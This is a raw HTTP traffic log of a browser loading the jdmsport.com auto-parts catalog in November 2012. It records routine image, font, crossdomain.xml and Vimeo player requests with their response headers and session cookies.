X-XN-Trace-Token: acd6973c-1233-4799-b9fe-347c8db6a750
Last-Modified: Wed, 04 Apr 2012 19:31:21 GMT
Content-Length: 386438
Cache-Control: max-age=2320149
Expires: Tue, 04 Dec 2012 22:55:22 GMT
Date: Thu, 08 Nov 2012 02:26:13 GMT
Connection: keep-alive
GET /files/bI-4UHjZeG-w-aB*s9UHuR3cQXRIc5FqmxB-DoBA9W7aDmstCTPZRCLpQVTIf2acJCuu8ejl0pePwj5wsRbVObflOfPnsVey/lajdmsport2012.jpg HTTP/1.1

Host: api.ning.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: Ning HTTP Server 2.0
X-XN-Trace-Token: aad2088b-02e2-42ee-93f1-90747183ed7e
Last-Modified: Tue, 28 Feb 2012 17:29:06 GMT
Content-Length: 341022
Cache-Control: max-age=1914361
Expires: Fri, 30 Nov 2012 06:12:15 GMT
Date: Thu, 08 Nov 2012 02:26:14 GMT
Connection: keep-alive
GET /crossdomain.xml HTTP/1.1

Host: av.vimeo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: application/xml
Server: Apache
Etag: &quot;e644bca8ba27c4293c9751ca82b696a6:1327001754&quot;
Last-Modified: Thu, 19 Jan 2012 19:35:53 GMT
Accept-Ranges: bytes
Content-Length: 311
Date: Thu, 08 Nov 2012 02:26:29 GMT
Connection: keep-alive
Set-Cookie: aka_debug=cpcode:84483~clientip:195.159.140.221~ghostip:195.159.219.8~requestid:305c264~time:1352341589~ghostforwardip:~edgecache:cache-hit; path=/
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Origin: *
GET /crossdomain.xml HTTP/1.1

Host: s3.amazonaws.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/xml
x-amz-id-2: BKNNq7J0iQ0r7zTyViaXZNqX/5tNLhL50Tk4K1jyxCgDnrFqRWdp/YEJxBBJOD1L
x-amz-request-id: ADEAA16C63774D30
Date: Thu, 08 Nov 2012 02:26:30 GMT
Transfer-Encoding: chunked
Server: AmazonS3
GET /crossdomain.xml HTTP/1.1

Host: player.vimeo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: application/xml
Server: Apache
Last-Modified: Wed, 10 Oct 2012 18:45:34 GMT
Expires: Sat, 08 Oct 2022 19:16:59 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 220
Accept-Ranges: bytes
Date: Thu, 08 Nov 2012 02:26:29 GMT
X-Varnish: 2840577783 692105926
Age: 2444970
Via: 1.1 varnish
X-Varnish-Cache: 1
Connection: close
X-VServer: 10.90.128.191
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
GET /images/stories/fd26.jpg HTTP/1.1

Host: www.ajdmparts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:18 GMT
Server: Apache
Last-Modified: Thu, 12 Apr 2012 01:19:08 GMT
Etag: &quot;9e51f7-3d6c1-4bd7124867122&quot;
Accept-Ranges: bytes
Content-Length: 251585
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/stories/fd24.jpg HTTP/1.1

Host: www.ajdmparts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:18 GMT
Server: Apache
Last-Modified: Thu, 12 Apr 2012 01:18:39 GMT
Etag: &quot;9e51f6-3f237-4bd7122c581a6&quot;
Accept-Ranges: bytes
Content-Length: 258615
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/stories/fd5.jpg HTTP/1.1

Host: www.ajdmparts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:18 GMT
Server: Apache
Last-Modified: Thu, 12 Apr 2012 01:23:44 GMT
Etag: &quot;9e51f9-40b39-4bd7134fa6283&quot;
Accept-Ranges: bytes
Content-Length: 265017
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /catalog/images/stories/kkt26.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:18 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 01:27:34 GMT
Etag: &quot;ffe0fe-464a0-4fc6c906&quot;
Accept-Ranges: bytes
Content-Length: 287904
Keep-Alive: timeout=15, max=88
Connection: Keep-Alive
GET /images/stories/fd10.jpg HTTP/1.1

Host: www.ajdmparts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:18 GMT
Server: Apache
Last-Modified: Thu, 12 Apr 2012 01:21:56 GMT
Etag: &quot;9e51f8-43ac7-4bd712e84b0d7&quot;
Accept-Ranges: bytes
Content-Length: 277191
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /files/FbfDP8T4rW6b*J5182yZzFrd9OLAp4Nb1EQwrStBWIeBphLqewEnZWGYf0c0nNTzopj3PPcxC4*skqC5zbOQEEDnOSWFzT6V/BIGINDUSTRYSHOW6.jpg HTTP/1.1

Host: api.ning.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: Ning HTTP Server 2.0
X-XN-Trace-Token: f15c4995-bf48-41b1-926b-24f90169b47b
Content-Length: 458845
Last-Modified: Wed, 04 Apr 2012 19:34:23 GMT
Cache-Control: max-age=1129919
Expires: Wed, 21 Nov 2012 04:18:12 GMT
Date: Thu, 08 Nov 2012 02:26:13 GMT
Connection: keep-alive
GET /files/UO9WoatT0eZT7ByN5TIawODwGEHeu5CcqBhpoAGZCgC9Y-DJw2H*H3lDLZfSFIWByROwkSyUkWQdwMn0N0A0OOF5tiOl97Ne/BIGINDUSTRYSHOW4.jpg HTTP/1.1

Host: api.ning.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: Ning HTTP Server 2.0
X-XN-Trace-Token: 17306855-d0d5-4fbc-9824-cae01e5d3e5d
Last-Modified: Wed, 04 Apr 2012 19:28:12 GMT
Content-Length: 427393
Cache-Control: max-age=228567
Expires: Sat, 10 Nov 2012 17:55:40 GMT
Date: Thu, 08 Nov 2012 02:26:13 GMT
Connection: keep-alive
GET /catalog/images/stories/kkt17.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:21 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 01:29:08 GMT
Etag: &quot;ffe103-360dd-4fc6c964&quot;
Accept-Ranges: bytes
Content-Length: 221405
Keep-Alive: timeout=15, max=87
Connection: Keep-Alive
GET /crossdomain.xml HTTP/1.1

Host: i3.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
If-Modified-Since: Thu, 09 Feb 2012 23:54:11 GMT
HTTP/1.1 304 Not Modified

HTTP/1.1 304 Not Modified
Date: Wed, 07 Nov 2012 20:35:10 GMT
Expires: Thu, 08 Nov 2012 02:35:10 GMT
Age: 21084
Server: GFE/2.0
GET /images/stories/fd50.jpg HTTP/1.1

Host: www.ajdmparts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:22 GMT
Server: Apache
Last-Modified: Thu, 12 Apr 2012 01:30:37 GMT
Etag: &quot;2150985-39b10-4bd714d94521b&quot;
Accept-Ranges: bytes
Content-Length: 236304
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/stories/fd53.jpg HTTP/1.1

Host: www.ajdmparts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:23 GMT
Server: Apache
Last-Modified: Thu, 12 Apr 2012 01:32:19 GMT
Etag: &quot;215098c-39993-4bd7153add44b&quot;
Accept-Ranges: bytes
Content-Length: 235923
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /catalog/images/stories/kkt18.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:23 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 01:30:08 GMT
Etag: &quot;ffe104-3c0f5-4fc6c9a0&quot;
Accept-Ranges: bytes
Content-Length: 246005
Keep-Alive: timeout=15, max=90
Connection: Keep-Alive
GET /photo/photo/slideshowFeedAlbum?id=6135669%3AAlbum%3A21418&mtime=1329492197&x=auXyBDLPb6jMSD1emkipwZM6Bun4zfLW&photo_width=2000&photo_height=2000 HTTP/1.1

Host: www.firm400.com
GET /photo/photo/slideshowFeedAlbum?id=6135669%3AAlbum%3A21418&amp;mtime=1329492197&amp;x=auXyBDLPb6jMSD1emkipwZM6Bun4zfLW&amp;photo_width=2000&amp;photo_height=2000 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: xn_visitor=91775a1b-a3ea-48d7-bbf3-9d428908bc56; ning_session=E4Iy0mgQ8KZlrROv2RwFK9VV+s5RKyT1ltylwibrgZ1SG9g/oSa3hJorMJ5SFjqw8cP3TmK1Cqw=
HTTP/1.1 200 OK

Content-Type: text/xml;charset=utf-8
Date: Thu, 08 Nov 2012 02:26:35 GMT, Thu, 08 Nov 2012 01:40:16 GMT, Thu, 08 Nov 2012 01:40:16 GMT
Server: Ning HTTP Server 2.0
Expires: Thu, 01 Jan 1970 00:00:00 GMT, Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ning_session=E4Iy0mgQ8KZlrROv2RwFK9VV+s5RKyT1ltylwibrgZ1SG9g/oSa3hPXXp3jbnoURoadmxXvJv1k=;Path=/;Domain=.firm400.com;Expires=Thu, 08-Nov-12 03:26:35 GMT
X-XN-Trace-Token: 49c5b06d-4da6-4d77-901f-99c6b7d76be5
Vary: X-XN_APPLICATION
P3P: CP=&quot;UNI STA LOC CURa OURa COR ALL IND&quot;
Last-Modified: Thu, 08 Nov 2012 01:40:16 UTC
Cache-Control: max-age=0, no-cache=&quot;Set-Cookie&quot;
Content-Encoding: gzip
Content-Length: 4975
X-XN-XNHTML: false
XG-Bazel-ValidSlug: false
GET /config/36576436?type=moogaloop&referrer=http%3A%2F%2Fjdmsport.com%2Fcatalog%2F&show_byline=0&show_portrait=0&color=00adef&loop=0&server=vimeo.com&fullscreen=1&v=1.0.0&show_title=0&autoplay=0&cdn_server=a.vimeocdn.com&player_server=player.vimeo.com&width=400&height=225 HTTP/1.1

Host: player.vimeo.com
GET /config/36576436?type=moogaloop&amp;referrer=http%3A%2F%2Fjdmsport.com%2Fcatalog%2F&amp;show_byline=0&amp;show_portrait=0&amp;color=00adef&amp;loop=0&amp;server=vimeo.com&amp;fullscreen=1&amp;v=1.0.0&amp;show_title=0&amp;autoplay=0&amp;cdn_server=a.vimeocdn.com&amp;player_server=player.vimeo.com&amp;width=400&amp;height=225 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: application/json
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.118
P3P: CP=&quot;IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT&quot;
Expires: Fri, 09 Nov 2012 02:26:35 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Transfer-Encoding: chunked
Date: Thu, 08 Nov 2012 02:26:35 GMT
X-Varnish: 1352252691
Age: 0
Via: 1.1 varnish
X-Varnish-Cache: 0
Connection: close
X-VServer: 10.90.128.193
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
GET /catalog/images/stories/kkt24.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:28 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 02:35:34 GMT
Etag: &quot;fff8ed-3ad52-4fc6d8f6&quot;
Accept-Ranges: bytes
Content-Length: 240978
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
GET /tumblr_m1vtlt3arW1qe7j3io3_1280.jpg HTTP/1.1

Host: 25.media.tumblr.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
x-amz-id-2: EWwqiPCH16SK7UB5WU0v8Tl58OEM0n7B8b/IibSK84LfsYgRnT2IHA3BU67A4kfQ
x-amz-request-id: 6F31A783F154DDA6
Last-Modified: Tue, 03 Apr 2012 02:30:09 GMT
x-amz-version-id: 4ErMJXHYUqQCkdRaizCLGYNWNRGMVXXZ
Etag: &quot;d45b5e02e024fa799b332e7dd8fa5329&quot;
Accept-Ranges: bytes
Content-Length: 537206
Server: AmazonS3
Cache-Control: max-age=13366845
Date: Thu, 08 Nov 2012 02:26:12 GMT
Connection: keep-alive
GET /files/4c0W6laACQTBqLaK-noEzM5mnWDkcwShK3zr261nyS6YWpkh2Re8bGolOqBSZN341R05y20TTzvTilwyX5kMkPkUfRsJ6d9b/BIGINDUSTRYSHOW3.jpg HTTP/1.1

Host: api.ning.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: Ning HTTP Server 2.0
X-XN-Trace-Token: dd15c008-994e-4c91-b603-094180a01e2d
Last-Modified: Wed, 04 Apr 2012 19:25:57 GMT
Content-Length: 511616
Cache-Control: max-age=599657
Expires: Thu, 15 Nov 2012 01:00:30 GMT
Date: Thu, 08 Nov 2012 02:26:13 GMT
Connection: keep-alive
GET /catalog/images/stories/kkt19.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:28 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 01:31:12 GMT
Etag: &quot;ffe107-446b4-4fc6c9e0&quot;
Accept-Ranges: bytes
Content-Length: 280244
Keep-Alive: timeout=15, max=88
Connection: Keep-Alive
GET /static/fonts/oswald/v7/-g5pDUSRgvxvOl5u-a_WHw.woff HTTP/1.1

Host: themes.googleusercontent.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fonts.googleapis.com/css?family=Oswald
Origin: http://jdmsport.com
HTTP/1.1 200 OK

Content-Type: font/woff
Last-Modified: Wed, 03 Oct 2012 18:35:27 GMT
Date: Wed, 07 Nov 2012 20:35:08 GMT
Expires: Thu, 15 Nov 2012 20:35:08 GMT
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 22224
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=691200
Age: 21089
GET /images/stories/fd54.jpg HTTP/1.1

Host: www.ajdmparts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:32 GMT
Server: Apache
Last-Modified: Thu, 12 Apr 2012 01:32:49 GMT
Etag: &quot;2150992-4102c-4bd715571675e&quot;
Accept-Ranges: bytes
Content-Length: 266284
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /catalog/images/stories/kkt2.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:32 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 02:18:27 GMT
Etag: &quot;ffe10f-3b499-4fc6d4f3&quot;
Accept-Ranges: bytes
Content-Length: 242841
Keep-Alive: timeout=15, max=87
Connection: Keep-Alive
GET /images/stories/fd42.jpg HTTP/1.1

Host: www.ajdmparts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:32 GMT
Server: Apache
Last-Modified: Thu, 12 Apr 2012 01:36:29 GMT
Etag: &quot;98da7a-392c2-4bd7162980988&quot;
Accept-Ranges: bytes
Content-Length: 234178
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /crossdomain.xml HTTP/1.1

Host: b.vimeocdn.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: application/xml
Server: Apache
Last-Modified: Sat, 20 Oct 2012 20:44:57 GMT
Etag: &quot;156-4cc83b1772440&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 220
Cache-Control: max-age=1055166
Expires: Tue, 20 Nov 2012 07:32:43 GMT
Date: Thu, 08 Nov 2012 02:26:37 GMT
Connection: keep-alive
GET /files/S0uzc*2ULiYSs9vVf5qgEOUmTtBzAfh12wLTSXIf9H3*m8JAi1Ck3c0Rn5XLVGMna8t-VsHfEAxDlN0JhEyFb7QaoAmeqzaf/MJ4.jpg HTTP/1.1

Host: api.ning.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: Ning HTTP Server 2.0
X-XN-Trace-Token: 46b35b16-fb7b-4215-a991-5ef0fa507b15
Content-Length: 264885
Last-Modified: Fri, 02 Mar 2012 02:35:20 GMT
Cache-Control: max-age=2107391
Expires: Sun, 02 Dec 2012 11:49:44 GMT
Date: Thu, 08 Nov 2012 02:26:33 GMT
Connection: keep-alive
GET /catalog/images/stories/kkt15.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
